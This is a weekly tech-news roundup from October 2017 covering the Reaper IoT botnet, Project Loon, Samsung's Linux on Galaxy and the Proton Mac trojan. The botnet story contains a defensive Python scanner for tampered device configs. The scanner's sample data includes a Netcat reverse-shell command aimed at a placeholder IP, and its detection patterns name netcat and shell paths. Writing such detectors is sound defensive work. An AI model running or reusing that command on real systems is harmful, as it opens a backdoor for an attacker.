Top Stories for the Week of October 25, 2017

Here are the stories we're following for the week of Wednesday, October 25, 2017.

A botnet of unknown intent has been discovered and is spreading at a frightening rate.

As we speak, miscreants are assembling a massive army of hacked "Internet of Things" devices – and at a much faster rate than previous botnets.

This new cyber-militia of compromised gadgets – dubbed IoT_reaper or Reaper by experts at Qihoo 360 Netlab – can be instructed by its masters to attack websites and kick services offline.

The botnet's foot-soldiers (mainly press-ganged, Internet-connected cameras, home routers, and similar gear) are located in more than a million organizations globally, claimed security biz Check Point on Thursday.

At first, it was assumed the malware infecting gizmos to form this latest army was a variant of the Mirai botnet that took over hundreds of thousands of pieces of internet-connected equipment in 2016. However, security researchers now think it is actually a different family of malicious software. There's also no word yet on what exactly the botnet will be used for.

The Reaper malware is spreading globally by exploiting various vulnerabilities in embedded devices (such as CVE-2017-8225) to steal and use the usernames and passwords of the gadgets' web-based control panels, ultimately to commandeer them.

For example, one of the botnet's drones – a hacked camera running a GoAhead embedded web server on TCP port 81 – had a System.ini file that had been changed to include a Netcat command that opened a reverse shell: a backdoor, in other words. This gave Reaper masters the command line to the device. Once the botnet's malware was on the camera, it then attempted to infect other equipment on the Internet. Any subsequently hacked devices would also cruise up and down the information superhighway in search of more vulnerable gizmos to hijack.

Right now, check to make sure you're not exposing a vulnerable device to the Internet, apply patches if you can, look out for suspicious behavior on your network, and take a gadget offline if infected.
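The story above describes a tampered GoAhead System.ini carrying a Netcat reverse-shell command. As an added defender-side example (not code from the story, Netlab or Check Point), the check below parses a config file and flags values that look like injected shell commands. It assumes System.ini is a plain key=value text file; the sample content is constructed.

```python
"""Flag injected shell commands in an embedded device's config file.
Added example; assumes a key=value INI layout, which the story does not
specify. The sample config below is constructed for demonstration."""
import re

# Indicators a defender would not expect inside a camera's web-server
# config: a netcat invocation, a shell path, an exec flag, an IP:port pair.
SUSPICIOUS = {
    "netcat":    re.compile(r"(?<![\w/])nc(?:at)?\b"),
    "shell":     re.compile(r"/bin/(?:ba)?sh\b"),
    "exec_flag": re.compile(r"\s-[ce]\s"),
    "ip_port":   re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}[: ]\d{2,5}\b"),
}

def parse_ini(text):
    """Return {(section, key): value}; keys before any [section] use ''."""
    entries, section = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, _, value = line.partition("=")
        entries[(section, key.strip())] = value.strip()
    return entries

def find_injected_commands(text, min_hits=2):
    """Return (section, key, indicators) for values matching at least
    `min_hits` distinct indicators. Requiring two avoids reporting a lone
    IP address in a legitimate value such as an NTP server setting."""
    findings = []
    for (section, key), value in parse_ini(text).items():
        hits = sorted(n for n, p in SUSPICIOUS.items() if p.search(value))
        if len(hits) >= min_hits:
            findings.append((section, key, hits))
    return findings

# Constructed sample: a clean config plus one tampered line resembling the
# reverse-shell command described in the story (203.0.113.10 is TEST-NET).
SAMPLE_INI = """
[system]
hostname=cam01
ntp_server=192.168.1.1
[web]
port=81
post_boot=nc 203.0.113.10 4444 -e /bin/sh
"""

if __name__ == "__main__":
    for section, key, hits in find_injected_commands(SAMPLE_INI):
        print(f"[{section}] {key}: matched {', '.join(hits)}")
```

Run it against a config pulled from a device you administer; a clean file produces no output, and a hit is a reason to take the device offline and reflash it.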

Google's "Project Loon" has brought Internet and cellular service to hurricane-devastated Puerto Rico.

Mobile phone data services have been boosted in blacked-out areas of hurricane-hit Puerto Rico by balloons that were provided by Google's parent company, Alphabet.

Project Loon devices beam signals between each other and to users on the ground.

This extends communications networks in places where infrastructure is scarce or has been damaged.

The balloons will allow residents with LTE phones to send and receive text messages and access the web.

However, much of the country is still without electricity and more than a quarter of the population lacks safe drinking water.

Alastair Westgarth, head of Project Loon, said, "This is the first time we have used our new machine learning powered algorithms to keep balloons clustered over Puerto Rico, so we're still learning how best to do this. As we get more familiar with the constantly shifting winds in this region, we hope to keep the balloons over areas where connectivity is needed for as long as possible."

Samsung hopes to succeed where other vendors have failed: it wants to bring the full desktop Linux experience to smartphones.

Samsung wants to bring the full power of desktop Linux to its smartphones.

The mobile giant announced this week that the "Linux on Galaxy" project will give smartphones the capability to "run Linux-based distributions on mobile devices."

So if you dream of using the smartphone in your pocket as a desktop Linux PC, you’ll be pleased to know that Samsung clearly shares that dream.

Linux on Galaxy will, based on the information currently available, be distributed as an app. It will be able to run multiple operating systems (likely including Ubuntu).

Linux distros run on the exact same Linux kernel that Android uses, and with no virtualisation or emulation involved, performance (theoretically) should be excellent.

But the true power will be unlocked when used with the Samsung DeX desktop dock accessory. This allows compatible phones to connect to an external display, a mouse and keyboard, and other peripherals.

The Samsung Galaxy S8 phone already allows users to use Android apps on a larger screen with a “desktop” style Android UI when docked with the DeX.

But while Android is great as a smartphone (and tablet) OS it’s not so hot as a desktop one.

Samsung says its users want “the convenience of their mobile device but also sometimes need the tried-and-true desktop computing environment, especially when it comes to interacting with productivity tools and entertainment contents that are best viewed on a larger monitor”.

"Linux on Galaxy" is still in the early stages of development. There’s no word on which devices the initiative plans to support, so I wouldn’t suggest rushing out to buy something Samsung-branded just yet.

Motorola, Microsoft and Canonical all tried, and failed, to bring “convergence” to the masses.

Do you have Elmedia Player or Folx on your Mac? You may need to wipe everything and reinstall macOS, because a nasty bit of malware came bundled with this popular software and is giving hackers full access to absolutely everything, including your iCloud account.

It's going to be an unpleasant week for some Mac users who are facing a complete system wipe and reinstall – after hackers stashed malware in legitimate applications.

Eltima Software, which makes the popular Elmedia Player and download manager Folx, has confessed the latest versions of those two apps came with an unwelcome extra: the rather horrid OSX.Proton malware.

The malware, which was injected into downloads of the applications, was spotted by security shop ESET, which alerted Eltima. A subsequent investigation revealed miscreants had got into the developer's servers, implanted the malware into the download files, and then let the company infect its users as they fetched the software.

Proton is a remote-control trojan designed specifically for Mac systems. It opens a backdoor granting root-level command-line access to commandeer the computer, and can steal passwords, encryption and VPN keys, as well as crypto-currencies from infected systems. It can even gain access to a victim's iCloud account regardless of whether two-factor authentication is used.

ESET warns that a complete OS reinstall is the only guaranteed way to rid your system of this malware.

License

If you post these videos, please provide credit along with a link back to http://www.category5.tv. Please consider donating to help us offset the high cost of offering free video to you, and the entire world.